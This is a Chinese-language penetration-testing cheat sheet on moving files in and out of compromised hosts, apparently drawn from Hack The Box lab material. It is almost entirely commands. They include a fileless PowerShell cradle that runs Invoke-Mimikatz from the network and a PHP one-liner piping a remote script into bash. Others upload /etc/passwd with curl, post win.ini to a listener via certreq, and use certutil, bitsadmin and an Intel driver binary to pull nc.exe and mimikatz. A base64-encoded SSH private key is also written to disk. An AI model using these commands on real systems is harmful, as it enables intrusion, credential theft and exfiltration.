Web Basic 1 2 3 4 5 6 php -S 0.0.0.0:port python3 -m http.server [port] # 默认端口为 8000 ruby -run -e httpd . [-p port] # 默认端口为 8080 # wget http://ip/file # curl -O http://ip/file
Nginx PUT 1 2 sudo mkdir -p /var/www/uploads/SecretUploadDirectory sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
/etc/nginx/sites-available/upload.conf
1 2 3 4 5 6 7 8 server { listen 9001; location /SecretUploadDirectory/ { root /var/www/uploads; dav_methods PUT; } }
链接到sites-enabled目录下
1 sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
启动服务
1 sudo systemctl restart nginx.service
端口被占用,可删除默认配置文件
1 sudo rm /etc/nginx/sites-enabled/default
上传文件
1 curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
ssh 1 2 ssh user@host "cat > /path/to/remote/file" < /path/to/local/file # 上传 ssh user@host "cat /path/to/remote/file" > /path/to/local/file # 下载
scp 1 2 3 4 5 6 7 scp file1 file2 user@host:/destination # 上传 scp user@host:/source /destination # 下载 -r 递归 -P 指定端口 -v 详细信息 -C 压缩 -o Compression=no 禁止压缩
Powershell Web Download 1 2 3 PS C:\> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1' ,'C:\Users\Public\Downloads\PowerView.ps1' )PS C:\> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' , 'C:\Users\Public\Downloads\PowerViewAsync.ps1' )
Fileless 1 2 3 PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1' )
Invoke-WebRequest 1 2 3 4 5 6 7 PS C:\> Invoke-WebRequest -Uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1PS C:\> iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -o PowerView.ps1
PowerShell Session PowerShell 远程处理会创建 HTTP 和 HTTPS 侦听器。侦听器在默认端口 TCP/5985(对于 HTTP)和 TCP/5986(对于 HTTPS)上运行。需要具有管理访问权限、成为Remote Management Users组成员或在会话配置中拥有 PowerShell 远程的明确权限。
target
1 2 3 4 5 6 7 8 9 PS C:\> Test-NetConnection -ComputerName DATABASE01 -Port 5985 ComputerName : DATABASE01 RemoteAddress : 192.168 .1.101 RemotePort : 5985 InterfaceAlias : Ethernet0 SourceAddress : 192.168 .1.100 TcpTestSucceeded : True
host
1 2 3 4 5 6 7 8 PS C:\> $Session = New-PSSession -ComputerName DATABASE01PS C:\> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\PS C:\> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session
Base64 Linux encode
1 2 base64 shell -w 0 # -w 0, 不换行 echo "<SNIP>" | base64 -d > shell
decode
1 2 3 4 5 6 echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQojIHNwYWNlLg0KIw0KIyBBZGRpdGlvbmFsbHksIGNvbW1lbnRzIChzdWNoIGFzIHRoZXNlKSBtYXkgYmUgaW5zZXJ0ZWQgb24gaW5kaXZpZHVhbA0KIyBsaW5lcyBvciBmb2xsb3dpbmcgdGhlIG1hY2hpbmUgbmFtZSBkZW5vdGVkIGJ5IGEgJyMnIHN5bWJvbC4NCiMNCiMgRm9yIGV4YW1wbGU6DQojDQojICAgICAgMTAyLjU0Ljk0Ljk3ICAgICByaGluby5hY21lLmNvbSAgICAgICAgICAjIHNvdXJjZSBzZXJ2ZXINCiMgICAgICAgMzguMjUuNjMuMTAgICAgIHguYWNtZS5jb20gICAgICAgICAgICAgICMgeCBjbGllbnQgaG9zdA0KDQojIGxvY2FsaG9zdCBuYW1lIHJlc29sdXRpb24gaXMgaGFuZGxlZCB3aXRoaW4gRE5TIGl0c2VsZi4NCiMJMTI3LjAuMC4xICAgICAgIGxvY2FsaG9zdA0KIwk6OjEgICAgICAgICAgICAgbG9jYWxob3N0DQo= | base64 -d > hosts md5sum hosts 3688374325b992def12793500307566d hosts
windows encode
1 2 3 4 5 6 7 8 PS C:\> [Convert ]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQojIHNwYWNlLg0KIw0KIyBBZGRpdGlvbmFsbHksIGNvbW1lbnRzIChzdWNoIGFzIHRoZXNlKSBtYXkgYmUgaW5zZXJ0ZWQgb24gaW5kaXZpZHVhbA0KIyBsaW5lcyBvciBmb2xsb3dpbmcgdGhlIG1hY2hpbmUgbmFtZSBkZW5vdGVkIGJ5IGEgJyMnIHN5bWJvbC4NCiMNCiMgRm9yIGV4YW1wbGU6DQojDQojICAgICAgMTAyLjU0Ljk0Ljk3ICAgICByaGluby5hY21lLmNvbSAgICAgICAgICAjIHNvdXJjZSBzZXJ2ZXINCiMgICAgICAgMzguMjUuNjMuMTAgICAgIHguYWNtZS5jb20gICAgICAgICAgICAgICMgeCBjbGllbnQgaG9zdA0KDQojIGxvY2FsaG9zdCBuYW1lIHJlc29sdXRpb24gaXMgaGFuZGxlZCB3aXRoaW4gRE5TIGl0c2VsZi4NCiMJMTI3LjAuMC4xICAgICAgIGxvY2FsaG9zdA0KIwk6OjEgICAgICAgICAgICAgbG9jYWxob3N0DQo= PS C:\> Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select HashHash ---- 3688374325 B992DEF12793500307566D
decode
1 2 3 4 5 6 7 8 9 10 PS C:\> [IO.File ]::WriteAllBytes("C:\Users\Public\id_rsa" , [Convert ]::FromBase64String("LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=" ))PS C:\> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5Algorithm Hash Path --------- ---- ---- MD5 4 E301756A07DED0A2DD6953ABF015278 C:\Users\Public\id_rsa
SMB Impacket smbserver 1 2 3 sudo impacket-smbserver share -smb2support /tmp/smbshare # or sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
Windows 1 2 3 4 5 6 7 8 C:\> copy \\192.168.220.133\share \nc.exe C :\> net use n : \\192.168.220.133\share /user:test test The command completed successfully .C :\> copy n :\nc.exe 1 file (s ) copied .
Linux 1 2 3 4 5 $ smbclient \\\\192.168.220.133\\share -U test%test smb: \> recurse ON # 启用递归模式 smb: \> prompt OFF # 关闭下载提示 smb: \> mget *
FTP Python3 pyftpdlib 1 python3 -m pyftpdlib --port 21
Windows 1 2 3 PS C:\> (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt' , 'C:\Users\Public\ftp-file.txt' )C:\> ftp anonymous@ftp-server
Linux 1 ftp anonymous@ftp-server
RDP mount linux folder rdesktop 1 rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
xfreerdp 1 xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
connect mount windows folder Windows 的mstsc.exe 远程桌面客户端
Language python 1 2 3 python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
php 1 2 3 4 5 6 php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);' php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);' php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
ruby 1 ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
perl 1 perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
nc 1 2 3 4 nc 10.10.10.10 9001 < file.exe nc -lp 8000 > file.exe # 重定向符可颠倒
Encrypted transmission Invoke-AESEncryption.ps1 1 PS C:\> Import-Module .\Invoke-AESEncryption .ps1
加密
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 PS C:\> Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\scan-results .txtFile encrypted to C:\\scan-results .txt.aes PS C:\> ls Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 11 /18 /2020 12 :17 AM 9734 Invoke-AESEncryption .ps1-a---- 11 /18 /2020 12 :19 PM 1724 scan-results .txt-a---- 11 /18 /2020 12 :20 PM 3448 scan-results .txt.aes<SNIP >
解密
1 PS C:\> Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\scan-results .aes
openssl 加密
1 2 3 4 $ openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc enter aes-256-cbc encryption password: Verifying - enter aes-256-cbc encryption password:
解密
1 2 3 $ openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd enter aes-256-cbc decryption password:
Living off The Land LOLBAS for Windows 和GTFOBins for Linux ,是可以搜索用于不同功能的二进制文件的网站。
LOLBAS
certreq.exe 1 2 C:\> certreq.exe -Post -config http ://192.168.49.128:8000/ c :\windows \win.ini Certificate Request Processor : The operation timed out 0x80072ee2 (WinHttp : 12002 ERROR_WINHTTP_TIMEOUT )
necat 接收
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ sudo nc -lvnp 8000 listening on [any] 8000 ... connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819 POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/json User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1) Content-Length: 92 Host: 192.168.49.128:8000 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
Bitsadmin 1 2 3 PS C:\> bitsadmin /transfer wcb /priority foreground http://10.10 .15.66 :8000 /nc.exe C:\Users\-student \Desktop\nc.exePS C:\> Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
Certutil 1 C:\> certutil.exe -verifyctl -split -f http ://10.10.10.32:8000/nc.exe
GfxDownloadWrapper.exe Windows 10 的英特尔显卡驱动程序
1 PS C:\> GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"
GTFOBins
openssl 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem Generating a RSA private key .......................................................................................................+++++ ................+++++ writing new private key to 'key.pem' ----- You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]: State or Province Name (full name) [Some-State]: Locality Name (eg, city) []: Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []:
启动服务
1 openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
在 taeget 下载文件
1 openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
